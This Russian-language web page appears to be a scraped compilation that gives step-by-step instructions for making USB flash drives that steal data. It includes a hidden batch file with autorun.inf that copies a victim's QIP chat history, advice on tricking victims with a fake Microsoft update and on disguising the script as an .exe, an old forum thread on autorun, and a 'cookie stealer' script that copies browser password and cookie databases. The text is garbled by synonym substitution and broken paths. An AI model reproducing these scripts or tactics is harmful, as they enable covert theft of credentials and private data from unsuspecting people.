Автозапуск bat файла с флешки. Как автоматически запустить bat файл при подключении флешки?

от

Форма входа

 

 

 Батник – это обыденный тексто­вый файл, содержащий наборы команд интерпретатора и имею­щий расширение .bat либо .cmd! (.cmd работают лишь в ОС се­мейства NT). Редактировать та­кие файлы можно при помощи блокнота “Или хоть какого другого текстового редактора.

 

Пишем батник

Создавать,батник будем для 2-ой ситуации (она не­много сложнее). Для написания батника возьмём обычный блокнот. В блокноте пропишем последующие строки:

 

@Echo off

c:

chdir C:Program FilesQIPUsers

f:rar.exe a -r users -r > nul

copy users.rar g:adc > nul

del users.rar > nul

 

где

©Echo off– прячет ви­зуальный процесс копиро­вания.

C:Program  FilesQIPUsers – папка, в которой находится история.

f:rar.exe а -г users > nul -запуск архиватора для ус­корения копирования.

copy users.rar g:adc > nul – адресок куда копируем.

del users.rar > nul – удаляет сделанный архив на жеском диске.

 

 Не постоянно бывает известна бук­ва флеш-диска. В “таком случае прописываем несколько вариан­тов (один уж точно угадаем):

 

@Echo off

с:

chdit C:Program FilesQIPUsers

f:rar.exe  а -г users > nul

copy users.rar e:abc > nul

 g:rar.exe a -r users > nul

copy users.rar g:abc > nul

h:rar.exe a -r users > nul

copy users.rar h:abc > nul

del users-rar > nul

 Сохраняем наш текстовый документ. Назовём его xxx.txt. Сейчас меняем расши­рение c .txt нa .bat. Это мож­но сделать в Total Commander’e.

 

Создаем автозапуск

Теперь нужно сделать так, что­бы батник автоматом запускался с флешки при под­ключении к компу. Для это­го создаём новейший текстовый до­кумент и пишем в нём:

 

[autorun]

ShellExeCute=”xxx.bat”

Сохраняем файл и переимено­вываем его на autorun.inf.

 

Делаем архив

 Далее нам предстоит позабо­тится о архиваторе. QIP-история может быть крупная. Что­бы процесс копирования происхо­дил скорее мы её заархивируем.

 

 Из папки с WinRAR (по умолча­нию C:Program FilesWinRAR бе­рём файлик rar.exe. Создаём в корне флешки папку с именованием abc. Также, в корень флешки бро­саем другие три файла (xxx.bat, autorun.inf, rar.exe).

 

 Все файлы скрываем от посто­ронних глаз (правой клавишей мы­ши вызываем Меню на файле > Характеристики > Скрытый. Это всё. Отдаём флешку “жертве” и ждём результата.

 

Социальная инженерия

 Не непременно делать авто­запуск. “Жертва” сама мо­жет запустить батник. Для этого нужно пользоваться социаль­ной инженерией. К примеру, со­общаем юзеру о том, что компания Microsoft выпустила новое обновление для Windows. Это обновление увеличивает быстро­действие и без­опасность опера­ционной системы. Устанавливать об­новление необходимо то­лько с флешки. Сможете сами придумать причи­ну, по которой на­до запустить наш батник. Всё зави­сит от вашей фан­тазии и смекалки.

 

Превращаем .bat в .exe

 Для большей “безопаснос­ти” neperoним .bat в .ехе (вдруг”жертва” знакома с напи­санием батников). В этом нам поможет маленькая програм­мка ExeScript v3.0.

 

 

 

 Скачать можноэдесь:  http://uploadbox.com/fMes/c8d5a60af9/ (размер 3.51. Мб).  В окне программы жмём иконку с незапятнанным листом и избираем Batch file (bat) либо File > New > Batch file (bat). В по­явившемся окне пишем наш “текст”.

Читайте также  Сделать все заглавные строчными. Как перевести заглавные буквы в строчные для Word

 

 Теперь укажем для на­шего ехе-шника подхо­дящую иконку. В окне Propertiesщёлкаем на полеCustom Iconи вы­бираем заранееприготовленную иконку. Дальше нажима­емF7 илиProject > Build.Всё, ехе-шник готов.

 

 

 

При вставке флешки выполнить батник

Я
   hd1

15.12.10 – 07:23
[AutoRun]
shellexecute=my.bat не отрабатывает

Как верно сделать? Либо windows такое в целях сохранности не делает? Ось – ХР.

   Гефест

1 – 15.12.10 – 07:24
   hd1

2 – 15.12.10 – 07:27
   Kavar

3 – 15.12.10 – 07:30
(0) Взгляни, как на флешке с вирусом реализовано )
или может в винде авторан отключен.
   hd1

4 – 15.12.10 – 07:33
(3) нету у меня “примера”
авторан разрешен, shellexecute=my.txt показывает
   hd1

5 – 15.12.10 – 07:34
(4) не, вру, не показывает
   vcv

6 – 15.12.10 – 07:34
Некоторые люди борются, что бы отключить все способности автозапуска. Так что пуск совершенно не гарантируется.
Возможно какая-то заплатка от МС задавила автозапуск на флэшках. Уж больно это черевато вирусами миллиону леммингов.
   hd1

7 – 15.12.10 – 07:35
работает shellexecute при даблклике по диску
   Kavar

8 – 15.12.10 – 07:37
А ежели exe заместо батника подсунуть?
   hd1

9 – 15.12.10 – 07:38
(6) верно, у меня отключен, на данный момент временно разрешил для проверки, и заплаток здесь нет не считая от кидо 2х на сп3. Задачка разовая, не нужно всепригодного решения, определенный компьютер где разрешен ауторан.
   smaharbA

10 – 15.12.10 – 07:38
mkdir autorun.inf
echo > recycler
attrib +h +s +r autorun.inf
attrib +h +s +r recycler
   Kavar

11 – 15.12.10 – 07:38
   hd1

12 – 15.12.10 – 07:41
(8) все отрабатывает лишь при клике “ауторан” либо даблклике, при вставке спрашивает “чо делать?”
   hd1

13 – 15.12.10 – 07:42
(10) я какбэ напротив хочу
   hd1

14 – 15.12.10 – 07:48
смотрю на диске работает так:
open=autorun.exe
на флешке не желает
в файле inf диска еще много что понаписано, может еще что указать требуется.
   ndv76

15 – 15.12.10 – 07:55
(0) У меня вот так работает:

[Autorun]
Open=StartPortableApps.cmd
Action=Start PortableApps.com
Icon=autorun.ico
Label=PortableApps

   hd1

16 – 15.12.10 – 08:02
(15) Action=Start пробел?
У меня не работает, может ты галку поставил делать постоянно выбранное действие? Либо на всяком “новом” пк стартует?
   hd1

17 – 15.12.10 – 08:03
(15) и что стартует? com либо cmd?
   smaharbA

18 – 15.12.10 – 08:14
на сколько помню, нужен опен и шелл (для деяния по умолчанию)
   hd1

19 – 15.12.10 – 08:23
видимо решение
[autorun]
open=1.cmd
Shellexecute=1.cmd
shellAutocommand=1.cmd
только записал, нод сходу стер его )
   andrewks

20 – 15.12.10 – 08:31
если авторан отключен, + патч для винды поставлен на это дело – не взлетит. и это хорошо!!!
   hd1

21 – 15.12.10 – 08:33
(19) антивирусам не нравится, но не работает
(20) ты ветку не читал
   Баклага

22 – 15.12.10 – 08:59
   hd1

23 – 15.12.10 – 09:01
   Dirk Diggler

24 – 15.12.10 – 09:13
поставь планировщик типа xStarter
   NikVars

25 – 15.12.10 – 09:22
   Сергей Д

26 – 15.12.10 – 09:22
Я постоянно отключаю автозапуск. Не достаточно ли что…
   Rebelx

27 – 15.12.10 – 09:22
(0) кури USB.Safely.Remove
   ndv76

28 – 15.12.10 – 09:29
(17) Стартует .cmd
Action добавляет пункт в контекстное меню.
А вообщем я переработал под собственные нужды autorun.inf сгенеренный програмкой TrueCript (Это шифровальщик такой).
   hd1

29 – 15.12.10 – 09:31
(24)(25)(26)(27) никто не читает ветку
   ndv76

30 – 15.12.10 – 09:34
+(28) А вообщем я для себя на флешке сделал раздел CDFS. Не стартует лишь ежели отключен автозапуск с СD-ROM.
 
 
   hd1

31 – 15.12.10 – 09:34
(28) …crypt.., окно не вылазит с вопросцем что делать?
   ndv76

32 – 15.12.10 – 09:36
   NikVars

33 – 15.12.10 – 09:38
(31) Это служба Определение обордования оболочки вопросцы задает?!
   hd1

34 – 15.12.10 – 09:38
(32) указывает список?:
– выполнить приложение
– открыть проводником
– ничего не делать
(30) так у тебя авторан на CDFS разделе?
   hd1

35 – 15.12.10 – 09:39
(33) я диск пихаю, ничо не задает, сходу драйвер на принтер начинает ставить, вот тогоже приблизительно и на флешке достигнуть хочу
   NikVars

36 – 15.12.10 – 09:41
Управление – Службы – отключи службу Определение оборудование оболочки.
И проверь собственный диск с драйверами принтера.
   hd1

37 – 15.12.10 – 09:47
   NikVars

38 – 15.12.10 – 10:12
(37) Не необходимо – не делай.
“Определение оборудования оболочки
Служба отвечает за автоматический пуск содержимого компакт-дисков либо присоединенной флэш-карты. Опосля отключения данной нам службы из диалога параметров съемных дисков либо компакт-дисков исчезнет вкладка Автозапуск, а также будет отключена сама возможность, реализуемая данной вкладкой. Отключение службы не влияет на возможность автозапуска дисков, за которую отвечает DWORD-параметр AutoRun из ветки реестра HKEY_LOCAL_MACHINESYSTEMCurrentControlSet ServicesCdrom. Ежели вы не используете возможность, предоставляемую вкладкой Автозапуск, то сможете смело отключать эту службу.

Читайте также  Как подключить трейд в стиме. Как включить подтверждение обмена (трейдов) в стиме?

Служба Определение оборудования оболочки занимает около 70 Кбайт оперативной памяти и запускается с правами локальной системы (Local System) автоматом при каждом входе юзера в систему (запускается как часть процесса svchost.exe). Чтоб отключить эту службу, нужно пользоваться параметром Start из ветки системного реестра HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesShellHWDetection.

Для пуска службы нужно, чтоб была запущена служба Удаленный вызов процедур (RPC). Для ее работы нужна библиотека shsvcs.dll.”
http://lib.rus.ec/b/174399/read

   hd1

39 – 15.12.10 – 10:20
(38) в действиях логика обязана быть, почитай ветку сначала
   NikVars

40 – 15.12.10 – 10:23
(39) Начнем с логики.
Накой для тебя необходимо то, что остальные отключают?
Посочнее раскажи.
   Dirk Diggler

41 – 15.12.10 – 10:24
(29) это ты ответы не читаешь.
   NikVars

42 – 15.12.10 – 10:27
(39) А логика в том, что ты даже и не знаешь кто это (что это) запускает прогу с твоего диска.
А есть случаи, когда Определение оборудования оболчки ничего не спрашивает, но делает.
   hd1

43 – 15.12.10 – 10:27
(40) никто ничего не отключает, нулевая венда сп3.
(41) плохая реклама хэстартера
   NikVars

44 – 15.12.10 – 10:28
(43) На нулевой винде не обязано быть нода.
   hd1

45 – 15.12.10 – 10:29
(42) ежели нет по для тебя слов то лучше не пиши
   hd1

46 – 15.12.10 – 10:30
   Dirk Diggler

47 – 15.12.10 – 10:30
(43) я гляжу, у тебя с башней мальца того… фурроров, короче
   NikVars

48 – 15.12.10 – 10:30
(45) Так где логика в наличие нода и слова твои про “нулевоую винду”?
   NikVars

49 – 15.12.10 – 10:31
(46) Так может там еще чего же необходимо отключить…
   hd1

50 – 15.12.10 – 10:31
(47) выздоравливай
(48) =>(9) здесь пишу, там использую
   NikVars

51 – 15.12.10 – 10:32
(50) Я для тебя указал сочную ссылку. Смотри мои посты.
   hd1

52 – 15.12.10 – 10:32
(49) не необходимо, есть задачка, у тебя есть рабочее решение?
Читайте также  Настройка 3g beeline на планшете. Как настроить и подключить интернет Билайна для планшета

Как сделать cookie-стиллер из флешки

Никогда, ни при каких критериях не сохраняйте пароли в браузере, сейчас расскажу почему.

Мы разглядим обычный, но действенный метод, быстро выяснить пароли, который, неосторожный юзер, а таковых много, поверьте, сохранил в браузере, это ведь так комфортно, правда, не нужно запоминать пароль, не необходимо каждый раз его вводить ручками и т.д. плюсов масса, но, есть один минус, и большой, украсть такие пароли вообщем не проблема.

Сейчас, мы быстро и вообщем не натуживаясь создадим из обычный флешки cookie-стиллер, а позже расшифруем файлы cookie, чтоб выяснить все пароли сохраненные в браузере.

Для начала, вы должны осознавать, что такое файл cookie, это, в собственном роде, таковой зашифрованный текстовый документ в котором храниться основная иформация о пользователе.

Но хватит теории, приступим.

Во первых, нам пригодиться флешка.

На ней мы сделаем два текстовых файла:

1-ый – autorun.inf

2-ой – stealer.bat

не забудьте включить отображение расширений файлов, чтобы можно было поменять txt на inf и bat соответственно, это ежели вдруг кто не догадался)

дальше, в файле autorun мы пишем:[AutoRun]Open=”stealer.bat”

[AutoRun]
Open=”stealer.bat”

всё, сохранили, закрыли. Это автозапуск нашего стиллера

В файле stealer.bat пишем:

@echo off
md %~d0Mozilla
md %~d0pera
md %~d0Google
md %~d0Yandex
md %~d0Amigo
CD/D %APPDATA%OperaOpera
cls
copy /y wand.dat %~d0Opera
copy /y cookies.dat %~d0Opera
cd %AppData%MozillaFirefoxProfiles*.default
copy /y cookies.sqlite %~d0Mozilla
copy /y key3.db %~d0Mozilla
copy /y signons.sqlite %~d0Mozilla
copy /y %AppData%MozillaFirefoxProfiles*.default %~d0Mozilla
cd %localappdata%GoogleChromeUser DataDefault
cls
copy /y “%localappdata%GoogleChromeUser DataDefaultLogin Data” “%~d0Google”
cd %localappdata%YandexYandexBrowserUser DataDefault
copy /y “%localappdata%YandexYandexBrowserUser DataDefaultLogin Data” “%~d0Yandex”
cd %localappdata%AmigoUser DataDefault
copy /y “%localappdata%AmigoUser DataDefaultLogin Data” “%~d0Amigo”
cls
ATTRIB -R -A -S -H
attrib +h %~d0Mozilla
attrib +h %~d0Opera
attrib +h %~d0Google
attrib +h %~d0Yandex
attrib +h %~d0Amigo
attrib +h %~d0search.bat
attrib +h %~d0new
attrib +h %~d0autorun.inf
del: autorun.inf?

тоже сохраняем, закрываем. Опосля чего же заходим в характеристики этих файлов и делаем их сокрытыми. Стиллер готов.

Сейчас, стоит тормознуть на неких аспектах. А именно:

В Windows 10 (и 8) наш авторан не сработает, там эта возможность банально отключена. Потому придется придумать метод получить доступ к компу и ручками запустить файл stealer.bat, благо процесс занимает чрезвычайно не достаточно времени, а придумать предлог сесть на минутку за чужой комп много мозга не нужно, ведь так? На всех прошлых версиях винды, всё произойдет само как-только человек вставит флешку в usb порт.

Последующий аспект, антивирус на эту манипуляцию никак не отреагирует, потому антивируса боятся не стоит, а вот фаервол всё это дело перекроет на раз два. Здесь принципиально осознавать, что человек который установил и настроил фаервол, походу что-то кое-где соображает и уж наверное не будет хранить пароли в браузере, к такому персонажу нужен наиболее узкий подход, в последующих видео придумаем.

По аспектам всё.

Оставьте комментарий